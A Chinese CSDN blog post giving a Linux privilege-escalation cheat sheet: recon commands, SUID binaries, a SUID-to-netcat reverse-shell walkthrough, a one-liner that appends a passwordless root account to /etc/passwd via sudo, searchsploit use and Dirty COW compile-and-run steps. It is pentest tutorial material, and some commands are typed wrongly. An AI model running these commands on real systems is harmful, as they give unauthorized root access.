Linux渗透操作

最新推荐文章于 2024-04-16 03:48:24 发布
最新推荐文章于 2024-04-16 03:48:24 发布
阅读量786 收藏 9
点赞数
分类专栏: 信息安全 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35350265/article/details/119932353
版权

目录

一、信息收集

1、系统和设备信息

2、用户和群组

3、用户和权限信息

4、环境信息

二、SUID

1、可用来提权的Linux可行性文件列表

2、查找SUID可执行性文件命令

3、SUID提权复现

三、利用root无密码执行

0、root无密码执行复现

四、获取root权限

五、利用内核漏洞提权

0、内核漏洞提权复现

六、脏牛提权

1、EXP下载

2、脏牛提权复现

一、信息收集

1、系统和设备信息

uname -a 打印所有可用的系统信息

uname -r 内核版本

uname -n 系统主机名

uname -m 查看系统内核架构

hostname 系统主机名

cat /proc/version  内核信息

cat /etc/issue 分发信息

cat /proc/cpuinfo CPU信息

2、用户和群组

cat /etc/passwd 列出系统上的所有用户

cat /etc/group 列出系统上所有组


grep-v-E"^#"/etc/password|awk-F:'$3==0{print $1}' 列出所有超级用户账号

whoami 查看当前用户

w 谁目前已登录,他们正在做什么

last 最后登录的列表

lastlog 所有用户上次登录的信息

lastlog -u %username% 指定用户的上次登录的信息

lastlog |grep -v "Never" 以前登录用户的

3、用户和权限信息

id 当前用户信息

cat /etc/sudoers 谁被允许以root身份执行

sudo -l 当前用户可以以root身份执行操作

4、环境信息

env 显示环境变量

echo %PATH 路径信息

history 显示当前用户的历史命令记录

pwd 输出工作目录

cat /etc/profile 显示默认系统变量

cat /etc/shells 显示可用的shell

二、SUID

SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件。

1、可用来提权的Linux可行性文件列表

nmap

vim

find

bash

more

less

nano

cp

2、查找SUID可执行性文件命令

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000-print2>/dev/null

find / -user root -perm -4000-exex ls ldb{}
/ 表示从文件系统的顶部(根)开始并找到每个目录

-perm 表示搜索随后的权限

-u=s 表示查找root用户所拥有的文件

-type 表示我们正在寻找的文件类型

f 表示常规文件,而不是目录或特殊文件

2 表示该进程的第二个文件描述符,即stdrr(标准错误)

> 表示重定向

/dev/null 是一个特殊的文件系统对象,它将丢弃写入其中的所有内容

3、SUID提权复现

(1)拿到一个网站服务器权限的shell

(2)查看具有root权限的SUID文件

(3)创建一个文件(用于测试find命令是否可以以root权限运行)

(4)用find命令查看是否可以以root权限运行

(5)用netcat将权限提升至root

(6)反弹回来后直接获取一个root权限

三、利用root无密码执行

这个命令&脚本文件可以以root身份运行,若在无密码的情况下执行的话,我们可以通过修改脚本内容或直接执行这个命令,利用命令进行一些操作来提权

eg:写入一个root身份权限的用户进入/etc/passwd文件中

0、root无密码执行复现

(1)查看当前用户权限

(2)发现teehee命令sudo不需要密码

(3)查看teehee命令的帮助文档

(4)写入一个ceshi账号到passwd里

四、获取root权限

### [用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]
### echo "ceshi::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

五、利用内核漏洞提权

用kali 的 searchspolit 可以帮助我们查看各种Linux发行版本的漏洞

0、内核漏洞提权复现

(1)拿到shell之后查看内核版本

cat /etc/issue;uname -a

(2)使用kali的searchsploit搜索有关这个版本的漏洞

root@kali:~# searchsploit Ubuntu16

(3)使用脚本提权

查看脚本内容,按照指南下载一个tar包来提权

六、脏牛提权

1、EXP下载

https://github.com/FireFart/dirtycow

2、脏牛提权复现

(1)使用uname -a 命令查看Linux内核信息

漏洞范围:大于2.6.22(2007年发行,到2016年10月18日修复)

(2)将exp下载到本地

执行gcc -pthread dirty.c -o dirty -lcrypt命令对dirty.c进行编译。生成一个dirty的可执行文件。

执行./dirty ceshi321密码命令,即可进行提权

(3)使用提权的账号密码即可获取root权限

多喝热水 
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试中,常用linux命令,带示例
qq_33993881的博客
03-28 432
这些命令是Linux系统管理和进程管理中的一部分,渗透测试人员可以使用它们来查看和管理系统进程
KaLi Linux渗透攻击
weixin_64531675的博客
06-12 3336
被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。使用browser_autopwn2模块可以建立一个攻击用的WEB服务器,这个服务器集成了多个浏览器漏洞,可以向浏览器发送各种攻击脚本,只要有一个攻击脚本攻击成功,即可建立会话。(将该网址复制到靶机中访问)
Kali Linux渗透测试技术详解_渗透测试入门
wangluoanquan111的博客
09-19 726
Kali Linux作为攻击端,为了以后能模拟漏洞场景,我还装了一个Debian11的虚拟机,Debian 11是官网下载的镜像文件,在Vmware中安装的时候有图文提示,一路安装正常,也设置了普通用户和root的登录密码,默认安装成功进入了图形化界面,作为专业开发我肯定想让他进入命令行模式,我在图形登录界面试了一下Ctro+Alt+F1-F6试了一下,Ctro+Alt+F3进入命令行,然后切换到root用户。为了方便用户进行渗透方面的工作,有人将所有的工具都预装在一个Linux系统,其中。
生命在于学习——Linux提权
易水哲的博客
11-03 1647
Linux提权的学习笔记记录。
【附教程】2024年10款渗透测试人员必备工具(Kali Linux+Nmap+Metasploit
最新发布
2401_83739777的博客
04-16 751
WireShark是非常流行的网络封包分析工具,可以截取各种网络数据包,并显示数据包详细信息。常用于开发测试过程中各种问题定位。本文主要内容包括:1、Wireshark软件下载和安装以及Wireshark主界面介绍。2、WireShark简单抓包示例。通过该例子学会怎么抓包以及如何简单查看分析数据包内容。3、Wireshark过滤器使用。通过过滤器可以筛选出想要分析的内容。包括按照协议过滤、端口和主机名过滤、数据包内容过滤。
组合利用三个Linux漏洞获得完整root权限
smellycat000的专栏
12-05 1131
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Qualys 公司的威胁研究团队表示,攻击者可利用一个新的Linux 漏洞 (CVE-2022-3328) 和其它两个看似无害的漏洞(CVE-2022-41974和CVE-2022-41973),在受影响系统上获得完整的root权限。CVE-2022-3328是位于Snapd 中的一个条件竞争漏洞。Snapd是由Canonical 公司开发的一款...
Kali Linux渗透测试技术详解
02-19
Kali Linux渗透测试技术详解本书由浅入深地介绍了Kali Linux的各种渗透测试技术。书中选取了最核心和最基础的内容进行讲解,让读者能够掌握渗透测试的流程,而不会被高难度的内容所淹没。本书涉及面广,从基本的知识...
Linux渗透教程
11-18
Linux渗透测试是一种安全评估方法,用于检测系统的安全性,找出潜在的漏洞,并采取措施进行修复。在本教程中,我们将深入探讨Linux渗透的基本原理,并通过实际案例来帮助理解这一过程。 首先,我们需要理解渗透测试...
linux内网渗透1
08-03
本文主要涉及的是Linux内网渗透的相关技术与步骤,主要分为以下几个部分: 1. **漏洞利用**: 提到了Wooyun上的一个漏洞(wooyun-2015-0144595),这个漏洞是针对Glassfish应用服务器的。攻击者通过该漏洞可以读取...
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,帮助安全人员更好的完成项目。课程主要内容:学习Kali Linux安全测试使用工具...
基于Kali Linux渗透测试.pdf
09-06
5. Kali Linux渗透测试平台 Kali Linux是一个基于Linux渗透测试平台,提供了大量的渗透测试工具和技术。Kali Linux可以帮助测试人员快速地进行渗透测试,并对系统的安全性进行评估。 6. 渗透测试的优势 渗透...
渗透linux时下载备份取shell的技巧 - 黑白网络.htm
04-19
渗透linux时下载备份取shell的技巧 - 黑白网络.htm
记录一次linux内网完整渗透测试
NZXHJ的博客
07-18 3496
记录一次完整系统的linux内网渗透测试
Liunx提权常用命令
普通Gopher
10-05 273
操作系统信息收集 如何查看服务器的版本 cat /etc/issue cat /etc/*-release cat /etc/lsb-release # 基于 Debian cat /etc/redhat-release # 基于 Redhat 如何查看内核的版本信息? cat /proc/version uname -a uname -mrs rpm -q kernel dmes...
超全的 Linux 机器的渗透测试命令备忘表 原创 2018-01-19 OSC - 协作翻译 开源中国 协作翻译 原文:Most Important Penetration Testing co
鲍鱼哥的博客
01-19 735
超全的 Linux 机器的渗透测试命令备忘表原文:Most Important Penetration Testing commands Cheat Sheet for Linux Machine链接:https://techincidents.com/important-penetration-testing-cheat-sheet/如下是一份 Linux 机器的渗透测试备忘录,是在后期开发期间
渗透测试-Kali Linux学习(Linux基础、Shell编程、渗透测试软件)
热门推荐
关注网络安全、云原生安全
01-18 1万+
目录结构 Linux的目录结构,类似于一棵树,根节点是“/”。 总览 打开“文件系统根目录” 或者 root@frank:/# cd / root@frank:/# ls 可查看根目录下的文件, 蓝色表示目录; 绿色表示可执行文件,包括.sh,.py等; 红色表示压缩文件,包括.zip、.tar等; 浅蓝色表示链接文件; 灰色表示其它文件,包括.conf,.db,.img,.old等; 黄色是设备文件,包括block, char, disk等。 bin 存放命令/可执行文
linux渗透的奇技淫巧
river
03-24 2240
linux渗透的奇技淫巧在网上get到了一个给Linux添加用户的技巧,通过环境变量执行脚本,进而达到添加 用户的目的。算不上是提权,记录一下,或许以后会有用。 通常,Linux在执行bash脚本时,如果BASH_ENV被设置的话,它就会执行BASH_ENV指向 的脚本。 首先先看一个例子第一步:建立一个test.sh脚本!#/bin/bash echo "test"第二步:在/tmp/目录下建
渗透测试之Linux基础(新手必看)
1匹黑马
04-13 3131
文章目录常用命令vi的使用登陆密码破解目录结构网络配置权限设置 常用命令 系统 uname -a # 查看内核/操作系统/CPU信息 head -n 1 /etc/issue # 查看操作系统版本 cat /proc/cpuinfo # 查看CPU信息 hostname # 查看计算机名 env # 查看环境变量 dmidecode #查...
linux渗透测试后续指南
Fly_鹏程万里
06-08 1900
0x00 为什么写这篇文章平时在渗透过程中,经常遇到服务器是Linux的系统,但是很多时候都不知道可以干嘛?今天就总结一下对于Linux入侵后可以干的那些事以及完成Linux服务器控制后,我们需要隐藏的痕迹。0x01 Linux入侵以后我们可以做哪些事情提权首先你得获得低权限的webshell/或者通过其他途径进入获得的低权限用户;通过服务器的漏洞来获得高权限;漏洞:CVE-2014-3153……...
Linux操作系统渗透测试
09-12
Linux操作系统渗透测试是通过Kali Linux工具对服务器场景的Linux操作系统进行安全漏洞扫描和渗透测试的过程。这个过程可以帮助评估Linux系统的安全性,并发现潜在的漏洞和脆弱性。在进行渗透测试时,可以采取多种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值